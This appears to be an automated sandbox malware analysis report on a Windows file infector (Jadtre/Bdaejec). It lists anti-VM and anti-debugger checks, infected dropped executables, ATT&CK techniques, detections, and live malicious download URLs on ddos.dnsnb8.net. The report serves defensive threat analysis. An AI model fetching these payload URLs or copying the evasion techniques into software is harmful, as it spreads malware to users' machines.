    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1054
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-7022
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C51718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00C51754h1_2_00C51718
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00C529E2
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C52B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00C52B8C
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
    Source: Amcache.hve.1.drBinary or memory string: VMware
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000003.2045756473.0000000000FBE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.1.drBinary or memory string: vmci.sys
    Source: Amcache.hve.1.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.1.drBinary or memory string: VMware20,1
    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW=
    Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeAPI call chain: ExitProcess graph end nodegraph_1-1029
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401EE2
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_00409607 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00409607
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_00414044 mov eax, dword ptr fs:[00000030h]0_2_00414044
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_0040CD6B CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_0040CD6B
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_00409867 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_00409867
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_00406000 SetUnhandledExceptionFilter,0_2_00406000
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_00401EE2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00401EE2
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_004035C0 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004035C0
    Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: GetLocaleInfoA,0_2_0040A82A
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_00406507 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00406507
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C5139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_00C5139F
    Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: sgKbPm.exe PID: 7164, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: sgKbPm.exe PID: 7164, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
    Command and Scripting Interpreter
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    11
    Input Capture
    11
    System Time Discovery
    1
    Taint Shared Content
    11
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts3
    Native API
    Boot or Logon Initialization Scripts2
    Process Injection
    1
    Access Token Manipulation
    LSASS Memory131
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    2
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS3
    File and Directory Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
    Obfuscated Files or Information
    LSA Secrets13
    System Information Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
    Software Packing
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    DLL Side-Loading
    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    yRc7UfFif9.exe97%ReversingLabsWin32.Virus.Jadtre
    yRc7UfFif9.exe88%VirustotalBrowse
    yRc7UfFif9.exe100%AviraW32/Jadtre.B
    yRc7UfFif9.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\sgKbPm.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\sgKbPm.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\sgKbPm.exe97%ReversingLabsWin32.Trojan.Skeeyah
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rar_100%Avira URL Cloudmalware
    http://www.activestate.com0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rar9100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarp100%Avira URL Cloudmalware
    http://www.activestate.comHolger0%Avira URL Cloudsafe
    http://www.scintilla.org/scite.rng0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rar100%Avira URL Cloudmalware
    http://www.rftp.comJosiah0%Avira URL Cloudsafe
    http://www.rftp.com0%Avira URL Cloudsafe
    http://www.scintilla.org0%Avira URL Cloudsafe
    http://www.baanboard.comBrendon0%Avira URL Cloudsafe
    https://www.smartsharesystems.com/0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rarB100%Avira URL Cloudmalware
    http://www.spaceblue.comMathias0%Avira URL Cloudsafe
    http://www.develop.com0%Avira URL Cloudsafe
    http://www.lua.org0%Avira URL Cloudsafe
    https://www.smartsharesystems.com/Morten0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rarB100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net/100%Avira URL Cloudmalware
    http://www.spaceblue.com0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rar100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarH100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarI100%Avira URL Cloudmalware
    http://www.baanboard.com0%Avira URL Cloudsafe
    http://www.develop.comDeepak0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k1.rarn100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://ddos.dnsnb8.net:799/cj//k1.rartrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rar9sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rar_sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://www.rftp.comJosiahSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.activestate.comSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://www.activestate.comHolgerSciTE.exe.1.drfalse
      • Avira URL Cloud: safe
      unknown
      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DEsgKbPm.exe, 00000001.00000003.2022814417.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://upx.sf.netAmcache.hve.1.drfalse
        high
        http://www.rftp.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarsgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarpsgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://www.baanboard.comBrendonSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        https://www.smartsharesystems.com/SciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.scintilla.orgSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarBsgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.develop.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.lua.orgSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarBsgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ddos.dnsnb8.net/sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://www.spaceblue.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarHsgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ddos.dnsnb8.net:799/cj//k2.rarIsgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://ddos.dnsnb8.net:799/cj//k1.rarnsgKbPm.exe, 00000001.00000003.2045756473.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F3E000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: malware
        unknown
        http://www.baanboard.comSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        http://www.develop.comDeepakSciTE.exe.1.drfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        44.221.84.105
        ddos.dnsnb8.netUnited States
        14618AMAZON-AESUSfalse
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1581653
        Start date and time:2024-12-28 12:24:08 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 39s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:yRc7UfFif9.exe
        renamed because original name is a hash value
        Original Sample Name:2024-12-28_7acf6527ef4bef7f7325a94c4d92c1f9.exe
        Detection:MAL
        Classification:mal100.spre.troj.evad.winEXE@5/11@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 99%
        • Number of executed functions: 19
        • Number of non-executed functions: 22
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 104.208.16.94, 40.126.53.21, 4.175.87.197, 13.107.246.63
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
        • Report size getting too big, too many NtOpenFile calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        TimeTypeDescription
        06:25:37API Interceptor1x Sleep call for process: WerFault.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        44.221.84.105gT6IitwToH.exeGet hashmaliciousBdaejecBrowse
        • ddos.dnsnb8.net:799/cj//k1.rar
        REQUEST FOR QUOTATION 1307-RFQ.exeGet hashmaliciousMassLogger RATBrowse
        • saytjshyf.biz/xoqfqirqhp
        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
        • npukfztj.biz/edmrjb
        http://setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.comGet hashmaliciousUnknownBrowse
        • setup.ghwr87ytiuwhgf4ihsjdnbbdvsh.com/favicon.ico
        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
        • saytjshyf.biz/eglmpsrvxnyx
        HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
        • saytjshyf.biz/peioi
        PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
        • npukfztj.biz/cbecuogqej
        Ziraat_Swift.htaGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
        • saytjshyf.biz/bkq
        invoice_96.73.exeGet hashmaliciousFormBookBrowse
        • jhvzpcfg.biz/tgcwttfqletfhyq
        Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
        • hehckyov.biz/ircdert
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        ddos.dnsnb8.netgT6IitwToH.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
        • 44.221.84.105
        #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
        • 44.221.84.105
        #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
        • 44.221.84.105
        gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
        • 44.221.84.105
        ib.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        1hdqYXYJkr.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        7Y18r(193).exeGet hashmaliciousBdaejec, StealcBrowse
        • 44.221.84.105
        BUG32.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        AMAZON-AESUSgT6IitwToH.exeGet hashmaliciousBdaejecBrowse
        • 44.221.84.105
        a2mNMrPxow.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
        • 34.226.108.155
        TNyOrM6mIM.exeGet hashmaliciousLummaCBrowse
        • 3.218.7.103
        FIyDwZM4OR.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
        • 34.226.108.155
        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
        • 3.218.7.103
        QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
        • 34.226.108.155
        No context
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        C:\Users\user\AppData\Local\Temp\sgKbPm.exegT6IitwToH.exeGet hashmaliciousBdaejecBrowse
          #U65b0#U7248#U7f51#U5173.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
            #U8865#U4e01#U6253#U5305.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
              #U65b0#U7248#U7f51#U5173Srv.exeGet hashmaliciousBdaejec, Neshta, RamnitBrowse
                gE4NVCZDRk.exeGet hashmaliciousBdaejec, RunningRATBrowse
                  ib.exeGet hashmaliciousBdaejecBrowse
                    SecuriteInfo.com.Win32.Malware-gen.17468.9520.exeGet hashmaliciousBdaejecBrowse
                      8VB4lVuZk3.exeGet hashmaliciousBdaejecBrowse
                        biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
                          biKy3nZEyJ.exeGet hashmaliciousBdaejecBrowse
                            Process:C:\Users\user\AppData\Local\Temp\sgKbPm.exe
                            File Type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):19456
                            Entropy (8bit):6.590637569763815
                            Encrypted:false
                            SSDEEP:384:1FHSQXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:aIQGPL4vzZq2o9W7GsxBbPr
                            MD5:F53A6BD117CBB10D686ED3312B007222
                            SHA1:7ADEAB4BCF49454B4E1653D5B6A558D1E2E4E91D
                            SHA-256:60EFDD3313120FB7480384C26FC021C4785B7F590B31177A9640BA13B8F45FB7
